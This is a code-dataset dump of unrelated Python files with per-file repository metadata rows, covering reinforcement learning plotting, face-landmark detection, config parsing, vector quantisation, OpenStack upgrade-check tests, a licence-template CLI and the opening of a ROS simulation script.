r[idx[i-1]] = +1. if (i < d.shape[1] and d[i,i] == d[i-1,i-1]) else -1.
return r
# Run optimization
avg_rewards, grad_norms = reinforce(ghu,
num_epochs = 100,
episode_duration = 3,
training_example = training_example,
reward = reward,
task = "swap",
learning_rate = .2,
# line_search_iterations = 5,
# distribution_cap = .1,
# likelihood_cap = .7,
distribution_variance_coefficient = 0.01,
verbose = 1)
pt.figure(figsize=(4,3))
pt.subplot(2,1,1)
pt.plot(avg_rewards)
pt.title("Learning curve")
pt.ylabel("Avg Reward")
pt.subplot(2,1,2)
pt.plot(grad_norms)
pt.xlabel("Epoch")
pt.ylabel("||Grad||")
pt.tight_layout()
pt.show()
| 30.753086 | 83 | 0.608591 | 316 | 2,491 | 4.664557 | 0.439873 | 0.033921 | 0.024423 | 0.028494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02603 | 0.259735 | 2,491 | 80 | 84 | 31.1375 | 0.773319 | 0.140506 | 0 | 0 | 0 | 0 | 0.055111 | 0.025907 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033898 | false | 0 | 0.135593 | 0 | 0.20339 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41aa2d6b40a21820a8c6f0096cf82ccb5a78479c | 1,103 | py | Python | face-alignment.py | binhmuc/faced | cbc18f552da9c53628d61d56de7dfda451a6e25f | [
"MIT"
] | null | null | null | face-alignment.py | binhmuc/faced | cbc18f552da9c53628d61d56de7dfda451a6e25f | [
"MIT"
] | null | null | null | face-alignment.py | binhmuc/faced | cbc18f552da9c53628d61d56de7dfda451a6e25f | [
"MIT"
] | null | null | null | import face_alignment
from skimage import io
import cv2
from skimage import img_as_float
from skimage import io
import matplotlib.pyplot as plt
from faced import FaceDetector
from faced.utils import annotate_image
import time
fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, face_detector='sfd')
video = cv2.VideoCapture(0)
def draw(fr,Z):
for i in Z:
cv2.circle(fr,i, 2, (225,255,255), -1)
return fr
frame_count = 0
tt_opencvHaar = 0
while True:
_, fr = video.read()
predss = fa.get_landmarks(fr)
if predss is not None:
for preds in predss:
Z = zip(preds[0:68,0], preds[0:68,1])
fr = draw(fr,Z)
##GET fps
frame_count += 1
t = time.time()
tt_opencvHaar += time.time() - t
fpsOpencvHaar = frame_count / tt_opencvHaar
label = "FPS : {:.2f}".format(fpsOpencvHaar)
cv2.putText(fr, label, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.4, (0, 0, 255), 3, cv2.LINE_AA)
if frame_count == 1:
tt_opencvHaar = 0
#---------------------------#
cv2.imshow('image',fr)
if cv2.waitKey(1) == 27:
break
cv2.destroyAllWindows()
| 23.978261 | 94 | 0.664551 | 170 | 1,103 | 4.188235 | 0.464706 | 0.05618 | 0.071629 | 0.053371 | 0.070225 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057239 | 0.192203 | 1,103 | 45 | 95 | 24.511111 | 0.741863 | 0.030825 | 0 | 0.111111 | 0 | 0 | 0.019608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.25 | 0 | 0.305556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41ac00fd9043a9b17ba6e49efc0299f2d40364b0 | 847 | py | Python | tests/test_fingers/test_theme/test_models.py | sonirico/wpoke | be193a41159dabf912d793eb5a6ebf2f0e9440bb | [
"MIT"
] | 4 | 2019-08-19T12:32:40.000Z | 2019-10-25T20:57:29.000Z | tests/test_fingers/test_theme/test_models.py | sonirico/wpoke | be193a41159dabf912d793eb5a6ebf2f0e9440bb | [
"MIT"
] | 15 | 2019-07-15T18:30:43.000Z | 2020-09-25T08:10:05.000Z | tests/test_fingers/test_theme/test_models.py | sonirico/wpoke | be193a41159dabf912d793eb5a6ebf2f0e9440bb | [
"MIT"
] | null | null | null | import unittest
from wpoke.fingers.theme.models import WPThemeMetadata
from wpoke.fingers.theme.serializers import WPThemeMetadataSerializer
class TestWPThemeMetadata(unittest.TestCase):
def test_serialize_empty_values(self):
wp_metadata_model = WPThemeMetadata()
serializer = WPThemeMetadataSerializer(wp_metadata_model)
w_serialized = serializer.data
self.assertIsInstance(w_serialized["tags"], list)
self.assertIsNone(w_serialized["theme_name"])
def test_serialize_tags_field(self):
wp_metadata_model = WPThemeMetadata()
wp_metadata_model.tags = "hacking, programming , devops"
serializer = WPThemeMetadataSerializer(wp_metadata_model)
w_serialized = serializer.data
self.assertListEqual(w_serialized["tags"], ["hacking", "programming", "devops"])
| 35.291667 | 88 | 0.747344 | 85 | 847 | 7.188235 | 0.423529 | 0.081833 | 0.12275 | 0.06874 | 0.369885 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0 | 0 | 0.168831 | 847 | 23 | 89 | 36.826087 | 0.867898 | 0 | 0 | 0.375 | 0 | 0 | 0.085006 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.125 | false | 0 | 0.1875 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41ae040201f6c28a176e8746c32a9793421e405a | 2,989 | py | Python | src/Config.py | albertomn86/Weather-Station-Receiver | 53745e51e8227ab40ced665ec0083bfd62a951da | [
"Apache-2.0"
] | 1 | 2020-01-13T20:56:49.000Z | 2020-01-13T20:56:49.000Z | src/Config.py | albertomn86/Weather-Station-Receiver | 53745e51e8227ab40ced665ec0083bfd62a951da | [
"Apache-2.0"
] | null | null | null | src/Config.py | albertomn86/Weather-Station-Receiver | 53745e51e8227ab40ced665ec0083bfd62a951da | [
"Apache-2.0"
] | null | null | null | from yaml import safe_load, YAMLError
from os import path
from src.Device import Device
from typing import Any, Optional
class Config(object):
def __init__(self, file: str):
if not path.exists(file):
raise FileNotFoundError(f"Config file not found: {file}")
with open(file, 'r') as stream:
try:
self.__config = safe_load(stream)
except YAMLError:
raise ConfigException(f"Invalid configuration file: {file}")
if self.__config is None:
raise ConfigException(f"Empty configuration file: {file}")
self.__serial_port = Config.__parse_receiver(self.__config)
self.__upload_addres, \
self.__upload_api_key = Config.__parse_upload(self.__config)
self.__devices_list, \
self.__allowed_devices_id_list, \
self.__devices_with_subsciption = \
Config.__parse_devices(self.__config)
@staticmethod
def __parse_receiver(config: dict) -> str:
receiver = config.get("Receiver")
if receiver is not None:
serial_port = receiver.get("SerialPort")
if serial_port is not None:
return serial_port
raise ConfigException("Serial port not specified")
@staticmethod
def __parse_upload(config: dict) -> tuple[Optional[Any], Optional[Any]]:
address = None
api_key = None
upload = config.get("Upload")
if upload is not None:
address = upload.get("Address")
api_key = upload.get("ApiKey")
return address, api_key
@staticmethod
def __parse_devices(config: dict) -> \
tuple[list[Device], list[Any], list[Any]]:
devices = config.get("Devices")
if devices is None:
raise ConfigException("No devices found")
device_list = []
allowed_id_list = []
devices_with_subscription = []
for item in devices:
device = Device(item)
if device.id in allowed_id_list:
continue
device_list.append(device)
allowed_id_list.append(device.id)
if device.subscription_device is not None:
devices_with_subscription.append(device.subscription_device)
return device_list, allowed_id_list, devices_with_subscription
def get_valid_devices_id_list(self) -> list:
return self.__allowed_devices_id_list
def get_device_by_id(self, id: str) -> Device:
return [x for x in self.__devices_list if x.id == id][0]
def get_devices_with_subscription(self) -> list:
return self.__devices_with_subsciption
def get_receiver_serial_port(self) -> str:
return self.__serial_port
def get_upload_address(self) -> Optional[Any]:
return self.__upload_addres
def get_upload_api_key(self) -> Optional[Any]:
return self.__upload_api_key
class ConfigException(Exception):
pass
| 31.797872 | 76 | 0.636333 | 354 | 2,989 | 5.031073 | 0.214689 | 0.039304 | 0.020213 | 0.029197 | 0.113419 | 0.086468 | 0.051656 | 0.051656 | 0 | 0 | 0 | 0.000465 | 0.280027 | 2,989 | 93 | 77 | 32.139785 | 0.827138 | 0 | 0 | 0.042254 | 0 | 0 | 0.060555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140845 | false | 0.014085 | 0.056338 | 0.084507 | 0.352113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41af722e2abcb956634da9556cf5120ca6d46ddf | 6,316 | py | Python | cwVQ.py | USC-MCL/Func-Pool | 20c43df0eb2da68d8d2e01c03d66a1a4e4e06081 | [
"MIT"
] | 3 | 2020-01-24T19:03:44.000Z | 2021-04-13T17:22:36.000Z | cwVQ.py | USC-MCL/Func-Pool | 20c43df0eb2da68d8d2e01c03d66a1a4e4e06081 | [
"MIT"
] | null | null | null | cwVQ.py | USC-MCL/Func-Pool | 20c43df0eb2da68d8d2e01c03d66a1a4e4e06081 | [
"MIT"
] | 3 | 2020-01-24T19:03:45.000Z | 2020-04-13T08:27:13.000Z | # 2020.10.19
# @yifan
# channel-wise VQ
# input is asumed to be DCT/PCA coefficients
#
import numpy as np
from sklearn import cluster
import copy
from skimage.metrics import mean_squared_error
from sklearn.metrics.pairwise import euclidean_distances
from myPCA import myPCA
from util import *
def check_mse(X, km, PSNR_TH):
mse_TH = 255**2 / pow(10, PSNR_TH / 10)
idx = km.predict(X)
res = km.cluster_centers_[idx]
mse = mean_squared_error(X, res)
if mse > mse_TH:
return mse, False
return mse, True
class cwVQ():
# cw_idx: splitting point
# cw_N: num codeword for each cluster
def __init__(self, cw_idx, cw_N, PSNR_TH):
self.cw_idx = cw_idx
self.cw_N = cw_N
self.PSNR_TH = PSNR_TH
self.km_list = []
self.cent_list = []
self.dim = 0
self.trained = False
def fit(self, X):
self.dim = X.shape[-1]
print(" \033[32m---> cwVQ, num of raining smaples: %d"%(X.shape[0]))
for i in range(1, len(self.cw_idx)):
tmp = X[:, self.cw_idx[i-1]:self.cw_idx[i]]
N = self.cw_N[i-1]
while N < 200 * self.cw_N[i-1]:
km = cluster.KMeans(n_clusters=int(N), n_init=7)
print(np.std(tmp))
km.fit(tmp)
mse, flag = check_mse(tmp, km, self.PSNR_TH)
#flag = True
if flag == True:
print(" ---> MSE=%3f nice, stop"%(mse))
break
N += 1
print(" ---> MSE=%3f too large, increase N to %2d"%(mse, N))
self.cw_N[i-1] = N
print(" <INFO> Finish training feature idx %d - %d, with N=%d" %(self.cw_idx[i-1], self.cw_idx[i], self.cw_N[i-1]))
km.cluster_centers_.sort(axis=0)
self.km_list.append(km)
self.cent_list.append(km.cluster_centers_)
print("\033[0m")
self.trained = True
def encode(self, X):
assert (self.trained == True), " \033[0;91m<ERROR> Call fit first!\033[0m"
idx = []
for i in range(1, len(self.cw_idx)):
tmp = X[:, self.cw_idx[i-1]:self.cw_idx[i]]
tmp_idx = np.argmin(euclidean_distances(tmp, self.cent_list[i-1]), axis=1)#self.km_list[i-1].predict(tmp)
idx.append(tmp_idx)
return idx
def decode(self, idx):
assert (self.trained == True), " \033[0;91m<ERROR> Call fit first!\033[0m"
res = []
print(idx[1][:10], self.cent_list[1][idx[1][:10]])
for i in range(len(idx)):
tmp = self.cent_list[i][idx[i]]
res.append(tmp)
res = np.concatenate(res, axis=1)
if res.shape[-1] < self.dim:
res = np.concatenate((res, np.zeros((res.shape[0], self.dim-res.shape[-1]))), axis=1)
return res
class cwVQ4D(cwVQ):
def __init__(self, cw_idx, cw_N, PSNR_TH, win, mode=0):
super().__init__(cw_idx, cw_N, PSNR_TH)
self.win = win
self.mode = mode
self.pca = myPCA(n_components=-1)
def to2D(self, X, train=True):
X = Shrink(X, {'win':self.win})
if self.mode == 1:
X = DCT(X)
X = ZigZag().transform(X)
elif self.mode == 2:
if train == True:
self.pca.fit(X)
self.pca.transform(X)
return X.reshape(-1, self.win**2), X.shape
def to4D(self, X, S):
X = X.reshape(S)
if self.mode == 1:
X = ZigZag().inverse_transform(X)
X = IDCT(X)
elif self.mode == 2:
self.pca.inverse_transform(X)
return invShrink(X, {'win':self.win})
def fit(self, X):
X, _ = self.to2D(X, train=True)
super().fit(X)
def encode(self, X):
X, S = self.to2D(X, train=False)
return super().encode(X), S
def decode(self, idx, S):
res = super().decode(idx)
return self.to4D(res, S)
class kmVQ():
def __init__(self, N):
self.km = cluster.KMeans(n_clusters=int(N), n_init=7)
self.cent = []
def fit(self, X):
print(" \033[32m---> VQ, num of raining smaples: %d"%(X.shape[0]))
self.km.fit(X)
self.cent = self.km.cluster_centers_
def encode(self, X):
return self.km.predict(X)
def decode(self, idx):
return self.cent[idx]
class kmVQ4D(kmVQ):
def __init__(self, N, win, mode=0):
super().__init__(N)
self.win = win
self.mode = mode
self.mode = mode
self.pca = myPCA(n_components=32)
def to2D(self, X, train=True):
X = Shrink(X, {'win':self.win})
if self.mode == 1:
X = DCT(X)
X = ZigZag().transform(X)
elif self.mode == 2:
if train == True:
self.pca.fit(X)
self.pca.transform(X)
return X.reshape(-1, self.win**2), X.shape
def to4D(self, X, S):
X = X.reshape(S)
if self.mode == 1:
X = ZigZag().inverse_transform(X)
X = IDCT(X)
elif self.mode == 2:
self.pca.inverse_transform(X)
return invShrink(X, {'win':self.win})
def fit(self, X):
X, _ = self.to2D(X, train=True)
super().fit(X)
def encode(self, X):
X, S = self.to2D(X, train=False)
return super().encode(X), S
def decode(self, idx, S):
res = super().decode(idx)
return self.to4D(res, S)
if __name__ == "__main__":
import time
from evaluate import *
import cv2
X = cv2.imread("/Users/alex/Desktop/proj/compression/data/Kodak/kodim01.png", 0)
X = X.reshape(1, X.shape[0], X.shape[1], 1)
t0 = time.time()
vq = cwVQ4D(cw_idx=[0, 1, 2, 3, 4],
cw_N=[6, 7, 7, 7],
PSNR_TH=30,
win=2)
vq.fit(X)
idx, S = vq.encode(copy.deepcopy(X))
iX = vq.decode(idx, S)
print(' \033[37m-->cwVQ using %s codewords, PSNR=%f, using time %5f sec'%(str(vq.cw_N), PSNR(X, iX), time.time()-t0))
t0 = time.time()
km = kmVQ4D(np.sum(vq.cw_N), 2)
km.fit(X)
idx, S = km.encode(X)
iX = km.decode(idx, S)
print(' -->VQ using %d codewords, PSNR=%f, using time %5f sec\033[0m'%(np.sum(vq.cw_N), PSNR(X, iX), time.time()-t0))
| 33.417989 | 131 | 0.528816 | 957 | 6,316 | 3.375131 | 0.174504 | 0.029721 | 0.03065 | 0.018576 | 0.501858 | 0.466873 | 0.460681 | 0.419505 | 0.381115 | 0.345511 | 0 | 0.036128 | 0.316339 | 6,316 | 188 | 132 | 33.595745 | 0.711904 | 0.028024 | 0 | 0.439759 | 0 | 0 | 0.088922 | 0.009626 | 0 | 0 | 0 | 0 | 0.012048 | 1 | 0.126506 | false | 0 | 0.060241 | 0.012048 | 0.295181 | 0.060241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41b1d06924eae19655ba9eb1faf5d08b5dbcc871 | 2,384 | py | Python | polsalt/scrunch1d.py | Richard-Tarbell/polsalt | e953985ffbc786fd071d0b48ebca5bd1dac9a960 | [
"BSD-3-Clause"
] | 1 | 2017-09-22T17:04:06.000Z | 2017-09-22T17:04:06.000Z | polsalt/scrunch1d.py | Richard-Tarbell/polsalt | e953985ffbc786fd071d0b48ebca5bd1dac9a960 | [
"BSD-3-Clause"
] | 14 | 2015-12-22T17:56:38.000Z | 2021-07-30T15:36:23.000Z | polsalt/scrunch1d.py | Richard-Tarbell/polsalt | e953985ffbc786fd071d0b48ebca5bd1dac9a960 | [
"BSD-3-Clause"
] | 12 | 2015-12-21T15:12:44.000Z | 2021-08-12T18:58:12.000Z | #! /usr/bin/env python
# Resample data into new bins, preserving flux
# New version 150912, much faster
# New version 170504, fixed case where output bin coverage is larger than input bin coverage
# New version 170909, again fixed case where output bin coverage is larger than input bin coverage
import os, sys, time, glob, shutil
import numpy as np
def scrunch1d(input,binedge):
# new binedges are in coordinate system x where the left edge of the 0th input bin is at 0.0
na = input.size
nx = binedge.size - 1
input_a = np.append(input,0) # deal with edge of array
# okxbin = ((binedge>=0) & (binedge<=na))
okxbin = ((binedge[1:]>0) & (binedge[:-1]<na))
okxedge = np.zeros(binedge.size,dtype=bool)
okxedge[:-1] |= okxbin
okxedge[1:] |= okxbin
output_x = np.zeros(nx)
# _s: subbins divided by both new and old bin edges
ixmin,ixmax = np.where(okxedge)[0][[0,-1]]
iamin = int(binedge[ixmin])
iamax = int(binedge[ixmax])
x_s = np.append(binedge[okxedge],range(int(np.ceil(binedge[ixmin])),iamax+1))
x_s,argsort_s = np.unique(x_s,return_index=True)
x_s = np.maximum(x_s,0.) # 20170909: deal with edge of array
x_s = np.minimum(x_s,na) # 20170909: deal with edge of array
ia_s = x_s.astype(int)
ix_s = np.append(np.arange(ixmin,ixmax+1),-1*np.ones(iamax-iamin+1))[argsort_s].astype(int)
while (ix_s==-1).sum():
ix_s[ix_s==-1] = ix_s[np.where(ix_s==-1)[0] - 1]
# np.savetxt("scrout_s.txt",np.vstack((ia_s,ix_s,x_s)).T,fmt="%5i %5i %10.4f")
# divide data into subbins, preserving flux
ix_x = np.zeros(nx+1).astype(int)
s_x = np.zeros(nx+1).astype(int)
input_s = input_a[ia_s[:-1]]*(x_s[1:] - x_s[:-1])
ix_x[ixmin:(ixmax+1)], s_x[ixmin:(ixmax+1)] = np.unique(ix_s,return_index=True)
ns_x = s_x[1:] - s_x[:-1]
# np.savetxt("scrout_x.txt",np.vstack((ix_x,np.append(ns_x,[0]),s_x)).T,fmt="%5i")
# sum it into the new bins
for s in range(ns_x.max()):
output_x[ns_x > s] += input_s[s_x[:nx][ns_x > s]+s]
return output_x
if __name__=='__main__':
input=np.loadtxt(sys.argv[1])
binedge=np.loadtxt(sys.argv[2])
# for n in range(1000): scrunch1d(input,binedge)
np.savetxt('outputfile.txt',scrunch1d(input,binedge),fmt="%14.8f")
| 40.40678 | 98 | 0.622903 | 411 | 2,384 | 3.472019 | 0.294404 | 0.019622 | 0.044149 | 0.029432 | 0.167484 | 0.148563 | 0.110722 | 0.082691 | 0.082691 | 0.082691 | 0 | 0.046088 | 0.217282 | 2,384 | 58 | 99 | 41.103448 | 0.71865 | 0.362836 | 0 | 0 | 0 | 0 | 0.018629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.058824 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41b47d2a2fab71fffa7fa7dc8edb5358a58ea4bf | 1,686 | py | Python | neutron_fwaas/tests/unit/cmd/upgrade_checks/test_checks.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/tests/unit/cmd/upgrade_checks/test_checks.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/tests/unit/cmd/upgrade_checks/test_checks.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_upgradecheck.upgradecheck import Code
from neutron_fwaas.cmd.upgrade_checks import checks
from neutron_fwaas.tests import base
class TestChecks(base.BaseTestCase):
def setUp(self):
super(TestChecks, self).setUp()
self.checks = checks.Checks()
def test_get_checks_list(self):
self.assertIsInstance(self.checks.get_checks(), list)
def test_fwaas_v1_check_sucess(self):
cfg.CONF.set_override('service_plugins', ['l3', 'qos'])
check_result = checks.Checks.fwaas_v1_check(mock.Mock())
self.assertEqual(Code.SUCCESS, check_result.code)
def test_fwaas_v1_check_warning(self):
plugins_to_check = [
['l3', 'firewall', 'qos'],
['l3',
'neutron_fwaas.services.firewall.fwaas_plugin:FirewallPlugin',
'qos']]
for plugins in plugins_to_check:
cfg.CONF.set_override('service_plugins', plugins)
check_result = checks.Checks.fwaas_v1_check(mock.Mock())
self.assertEqual(Code.FAILURE, check_result.code)
| 35.87234 | 75 | 0.707592 | 228 | 1,686 | 5.078947 | 0.47807 | 0.051813 | 0.041451 | 0.027634 | 0.195164 | 0.162349 | 0.107081 | 0.107081 | 0.107081 | 0.107081 | 0 | 0.011128 | 0.200475 | 1,686 | 46 | 76 | 36.652174 | 0.847923 | 0.326216 | 0 | 0.08 | 0 | 0 | 0.099822 | 0.052585 | 0 | 0 | 0 | 0 | 0.12 | 1 | 0.16 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41b838c1916c793c834d6840367d6af260c3208a | 4,822 | py | Python | licensegh/licensegh.py | sauljabin/licensegh | 01dad5a8934869423feb9bc59854631ab1cb6e08 | [
"MIT"
] | null | null | null | licensegh/licensegh.py | sauljabin/licensegh | 01dad5a8934869423feb9bc59854631ab1cb6e08 | [
"MIT"
] | null | null | null | licensegh/licensegh.py | sauljabin/licensegh | 01dad5a8934869423feb9bc59854631ab1cb6e08 | [
"MIT"
] | null | null | null | import os
import re
import shutil
import git
import yaml
from rich import box
from rich.console import Console
from rich.prompt import Prompt
from rich.table import Table
class Licensegh:
def __init__(self):
self.repository = TemplatesRepository()
self.licenses = []
def init(self):
self.repository.init()
self.load_licenses()
def load_licenses(self):
for dirpath, dirnames, filenames in os.walk(self.repository.licenses_path):
filenames = [
filename for filename in filenames if filename.endswith(".txt")
]
filenames.sort()
for license_path in filenames:
self.licenses.append(License(os.path.join(dirpath, license_path)))
def print_all_licenses(self):
self.print_licenses(self.licenses)
def print_license_by_id(self, license_id):
licenses = [license for license in self.licenses if license_id == license.id]
if len(licenses) == 0:
console = Console()
console.print("[red]License not found[red]")
else:
licenses[0].load()
licenses[0].print()
def print_licenses_by_id(self, license_id):
licenses = [
license
for license in self.licenses
if re.match(".*({}).*".format(license_id), license.id)
]
if len(licenses) == 0:
console = Console()
console.print("[red]Licenses not found[red]")
else:
self.print_licenses(
licenses,
True,
)
def print_licenses(self, licenses, print_description=False):
console = Console()
table = Table(box=box.HORIZONTALS)
table.add_column("Id", style="cyan", justify="right")
table.add_column("Name", style="magenta")
for license in licenses:
license.load()
if print_description:
table.add_row(
license.id,
"{}\n[white]{}[white]".format(license.name, license.description),
)
else:
table.add_row(license.id, license.name)
console.print(table)
def save_license_by_id(self, license_id):
licenses = [license for license in self.licenses if license_id == license.id]
if len(licenses) == 0:
console = Console()
console.print("[red]License not found[red]")
else:
licenses[0].load()
licenses[0].save()
def reset_repository(self):
self.repository.remove()
class License:
def __init__(self, path):
self.path = path
self.directory, self.file_name = os.path.split(self.path)
self.id = self.file_name.replace(".txt", "")
self.description = ""
self.name = ""
self.text = ""
self.arguments = []
def load(self):
with open(self.path, "r") as file:
full_text = file.read()
cut_index = full_text.find("---", 3)
file_parts = {
"metadata": full_text[:cut_index],
"text": full_text[cut_index + 3 :],
}
metadata = yaml.safe_load(file_parts["metadata"])
self.description = metadata["description"].strip()
self.name = metadata["title"].strip()
self.text = file_parts["text"].strip()
self.arguments = list(set(re.findall(r"\[([a-z]+)\]", self.text)))
def print(self):
console = Console()
console.print(
"[green]Name:[green]\t[magenta bold]{}[magenta bold]".format(self.name)
)
console.print(
"[green]Id:[green]\t[magenta bold]{}[magenta bold]".format(self.id)
)
console.rule()
console.print(self.text.replace("[", r"\["))
def save(self):
text_to_save = self.text
for argument in self.arguments:
value = Prompt.ask(
f"[magenta]Enter argument[magenta] [cyan]{argument}[cyan]"
)
text_to_save = text_to_save.replace(f"[{argument}]", value)
with open("LICENSE", "w") as file:
file.write(text_to_save)
def __eq__(self, o):
return self.id == o.id
class TemplatesRepository:
def __init__(self):
self.path = os.path.expanduser("~/.licensegh/choosealicense")
self.licenses_path = os.path.join(self.path, "_licenses")
self.remote = "https://github.com/github/choosealicense.com.git"
def init(self):
if os.path.isdir(self.path):
repo = git.Repo(self.path)
repo.remotes.origin.pull()
else:
git.Repo.clone_from(self.remote, self.path)
def remove(self):
shutil.rmtree(self.path)
| 29.950311 | 85 | 0.562837 | 549 | 4,822 | 4.812386 | 0.218579 | 0.037472 | 0.020818 | 0.039364 | 0.236563 | 0.202498 | 0.202498 | 0.202498 | 0.173732 | 0.173732 | 0 | 0.002708 | 0.310659 | 4,822 | 160 | 86 | 30.1375 | 0.792118 | 0 | 0 | 0.193798 | 0 | 0 | 0.094981 | 0.021775 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131783 | false | 0 | 0.069767 | 0.007752 | 0.232558 | 0.124031 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41bb07f1d7bec345e20d3accf21f60a21b94cceb | 192 | py | Python | ABC104/ABC104a.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC104/ABC104a.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | ABC104/ABC104a.py | VolgaKurvar/AtCoder | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | [
"Unlicense"
] | null | null | null | # ABC104a
import sys
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
r = int(input())
if r < 1200:
print('ABC')
exit(0)
if r < 2800:
print('ARC')
exit(0)
print('AGC')
| 13.714286 | 28 | 0.609375 | 30 | 192 | 3.9 | 0.666667 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10596 | 0.213542 | 192 | 13 | 29 | 14.769231 | 0.668874 | 0.036458 | 0 | 0.181818 | 0 | 0 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0.272727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41be27ee6f0699ebf633e908194ed90a7940707d | 13,708 | py | Python | low_level_simulation/src/path_utilities/src/simulation_util.py | abiantorres/autonomous-vehicles-system-simulation | 3f0112036b2b270f5055729c648a1310976df933 | [
"Apache-2.0"
] | null | null | null | low_level_simulation/src/path_utilities/src/simulation_util.py | abiantorres/autonomous-vehicles-system-simulation | 3f0112036b2b270f5055729c648a1310976df933 | [
"Apache-2.0"
] | null | null | null | low_level_simulation/src/path_utilities/src/simulation_util.py | abiantorres/autonomous-vehicles-system-simulation | 3f0112036b2b270f5055729c648a1310976df933 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import rosbag, rospy, actionlib, time, sys, csv, rospkg, re, os
from gazebo_msgs.msg import ModelState
from std_msgs.msg import Empty
from std_srvs.srv import Empty
from gazebo_msgs.srv import SetModelState
from geometry_msgs.msg import PoseArray
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from actionlib_msgs.msg import *
from obstacles_util import ObstaclesModelGenerator
from results_util import SimulationResults
from db_client import DBClient
# Path information messages
from costum_msgs.msg import SimulationMsg
import Tkinter
import tkMessageBox
class SimulationExecutor():
def __init__(self):
self.rospack = rospkg.RosPack()
self.navigation_pkg_path = str(self.rospack.get_path('navigation'))
self.csv_path = re.sub("navigation","", self.navigation_pkg_path)
self.csv_path = re.sub("/src/","/csv/",self.csv_path)
self.db_client = DBClient()
# Get some parameters
